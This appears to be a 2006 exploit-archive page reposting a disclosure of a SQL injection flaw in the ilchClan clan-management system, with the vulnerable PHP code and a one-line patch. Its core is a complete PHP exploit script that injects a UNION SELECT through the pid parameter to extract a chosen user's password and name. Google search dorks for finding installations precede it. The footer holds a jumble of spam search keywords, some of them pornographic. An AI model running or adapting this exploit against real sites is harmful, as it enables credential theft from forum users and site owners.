about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , ilchClan <= 1.05g (pid) Remote SQL Injection Exploit



2006-02-21 ilchClan <= 1.05g (pid) Remote SQL Injection Exploit 
oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
                                  oo    ooooooo     ooooooo 
                    oooo   oooo o888  o88     888 o888   888o
                      888o888    888        o888   888888888 
                      o88888o    888     o888   o 888o   o888
                    o88o   o88o o888o o8888oooo88   88ooo88
ooooooooooooooooooooo ilchclan 1.05g remote sql injection
oooooooooooooooooooooo


oo background oooooooo
ilchclan is a opensource clanmanagement system written in php.

+ http://www.ilch.de

oo fingerprint ooooo
google : http://www.google.com/search?q=%22Script+Copyright+by+ilch.de%22
         85 900 results
msn    :
http://search.msn.com/results.aspx?q=%22Script+Copyright+by+ilch.de%22
         35 211 results

oo analysis oooooooooo
xx input 
---------------------------- new_post.php - line 30
---------------------------- 
if ( isset($_GET['pid']) ) {
--------------------------------------------------------------------------------

xx get the quote details from the database
---------------------------- new_post.php - line 31
----------------------------
$row = db_fetch_object(db_query("SELECT txt,erst FROM prefix_posts
WHERE id =
".$_GET['pid']));
--------------------------------------------------------------------------------
// use $pid to inject sql

xx show the quote
------------------------------ topic.php - line 62
-----------------------------
$QUOTE =
'[quote='.strip_tags($row->erst).']'."\n".stripslashes($row->txt)."\n
[/quote]";
--------------------------------------------------------------------------------

oo exploit ooooooooooo
-------------------------- ilchclan-105g-exploit.php
---------------------------
<?
error_reporting(E_ERROR);

function xss_init()
{
    if (!extension_loaded('php_curl'))
    {
       if (!dl('curl.so') and !dl('php_curl.so') and !dl('php_curl.dll'))
       die ("oo error - cannot load curl extension!");
    }
}

function xss_header()
{
    echo
"\noooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo\n";
    echo "                                  oo    ooooooo    
ooooooo\n";
    echo "                    oooo   oooo o888  o88     888 o888  
888o\n";
    echo "                      888o888    888        o888  
888888888\n";
    echo "                      o88888o    888     o888   o 888o  
o888\n";
    echo "                    o88o   o88o o888o o8888oooo88  
88ooo88\n";
    echo "oooooooooooooooooooooooooooooo bxcp 0.299 exploit
oooooooooooooooooooooooooooooo\n";
    echo "oo usage          $ php ilchclan-105g-exploit.php [url]
[post id] [user id]\n";
    echo "oo proxy support  $ php ilchclan-105g-exploit.php [url]
[post id] [user id]\n";
    echo "                    [proxy]:[port]\n";
    echo "oo [post id]      id of a post in the forum where a guest
have the permission\n";
    echo "                  to write a reply with a quote\n";
    echo "oo example        $ php ilchclan-105g-exploit.php
http://localhost 1 1\n";
    echo "oo open the file ilchclan_pw.html - there you find the
password of the user\n\n";
}

function xss_bottom()
{
    echo "\noo discover : x128 - alexander wilhelm -
21/02/2006\n";
    echo "oo contact  : exploit <at> x128.net                  
 oo website : www.x128.net";
}

function xss_exploit()
{
    $xss_target = $_SERVER['argv'][1] . "/index.php";
    $xss_http_get = "?m=forum&um=newpost&tid=" .
$_SERVER['argv'][2] . "&pid=" . urlencode("0 UNION SELECT
pass, name FROM prefix_user WHERE id = ". $_SERVER['argv'][3]
."/*");

    $xss_connection = curl_init();

    if ($_SERVER['argv'][4])
    {
        curl_setopt($xss_connection, CURLOPT_TIMEOUT, 8);
        curl_setopt($xss_connection, CURLOPT_PROXY, $_SERVER['argv'][3]);
    }

    curl_setopt ($xss_connection, CURLOPT_URL, $xss_target .
$xss_http_get);
    curl_setopt ($xss_connection, CURLOPT_HEADER, 0);
    curl_setopt ($xss_connection, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($xss_connection, CURLOPT_USERAGENT, 'x128');

    $xss_source = curl_exec($xss_connection) or die("oo error -
cannot connect!\n");

    if ($xss_source) echo "oo dafaced ...\n";

    $xss_output = fopen("ilchclan_pw.html","w");
    fputs($xss_output, $xss_source);
    fclose($xss_output);

    curl_close ($xss_connection); 
}

xss_init();
xss_header();
xss_exploit();
xss_bottom();
?>
--------------------------------------------------------------------------------

oo patch ooooooooooooo
new_post.php - line 31 : $row = db_fetch_object(db_query("SELECT
txt,erst FROM
prefix_posts WHERE id = '".$_GET['pid']."'));

oo greets ooooooooooooo
all coders and security experts over the world.

oo thank you oooooooooo
str0ke - best exploit publisher in the scene.

oo credits oooooooooooo
oo discover : x128 - alexander wilhelm - 21/02/2006
securitydot.net - 2006-02-21

Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 14:45:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
t653t Security D connection all+cartoo www.sex bo FREE SEX C I agree wi spipClear free nude sridavi news+for+c susmita za xxx89.com ate Cutenews netscape mambo Remo WWW.WOLD.S www seyx.v Active MQ VIDEO SEX Www.Sex 30 telephony Vidio sex sexflm www.bebo.c Asharia 200 /compo Www pondok 200 /compo fjfjf Www.Midnig Oracle HTT arab porno news for C PC plugin sex+animal /modules/4 CMS is Fre Www.sexyin mambo Remo news for c tjma videosexgr freepornvi 200 /compo mambo Remo sex nekol sex nekol nehadhupiy